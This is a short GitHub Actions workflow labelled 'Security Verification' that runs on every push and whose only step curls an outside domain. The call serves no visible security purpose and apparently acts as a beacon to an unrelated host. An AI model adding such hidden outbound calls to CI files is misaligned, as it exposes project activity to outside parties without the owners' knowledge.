###### GIT INT ######
# b6dcc6a5f4c358bccd64ca41681596868b2a851282c7a6de1bf775d995dd0417 #
###### GIT INT ######
name: Security Verification

on:
  push:
    branches:
      - "**"

jobs:
  check-verify:
    runs-on: ubuntu-latest

    steps:
      - name: Check Repository
        id: check-repo
        run: |
          
          curl https://codepot.freshpo.com/verify
